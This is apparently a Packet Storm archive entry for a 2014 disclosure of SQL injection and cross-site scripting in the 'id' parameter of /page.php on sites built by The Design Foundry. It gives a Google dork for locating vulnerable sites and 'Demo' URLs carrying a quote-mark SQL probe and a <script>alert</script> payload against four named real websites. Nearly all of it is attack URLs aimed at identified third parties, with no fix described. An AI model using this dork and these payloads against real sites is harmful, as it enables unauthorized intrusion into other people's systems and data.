Design Foundry Cross Site Scripting / SQL Injection

2014-07-21T00:00:00
ID PACKETSTORM:127539
Type packetstorm
Reporter Hekt0r
Modified 2014-07-21T00:00:00

Description

                                        
                                            `[+] Title: Foundry CMS Multiple Vulnerability  
[+] Date: 2014/07/20  
[+] Author: Hekt0r  
[+] Vendor Homepage: www.design-foundry.co.uk  
[+] Tested on: Windows 7 & Kali Linux  
[+] Vulnerable Files: /page.php  
[+} Dork : intext:"Site by The Design Foundry"  
### POC:  
[+] Sql Injection: http://site/page.php?id=[SQL-Injection]  
[+] XSS: http://site/page.php?id=[XSS]  
### Demo:  
[+] Sql injection: http://www.resonatehub.co.uk/page.php?id=1'  
http://www.sutcliffe.co.uk/page.php?id=1'  
http://www.warmerenergyservices.com/page.php?id=25'  
http://www.my-maintenance.com/page.php?id=1'  
[+] Xss: http://www.resonatehub.co.uk/page.php?id=  
<script>alert(/xss/)</script>  
http://www.sutcliffe.co.uk/page.php?id=  
<script>alert(/xss/)</script>  
http://www.warmerenergyservices.com/page.php?id=  
<script>alert(/xss/)</script>  
http://www.my-maintenance.com/page.php?id=  
<script>alert(/xss/)</script>  
### Credits:  
[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire,Ali Ahmady Saeed.Jok3r,  
M4hdi,  
ALIREZA_PROMIS And All members of Iran Security Group  
[+] iransec.net  
`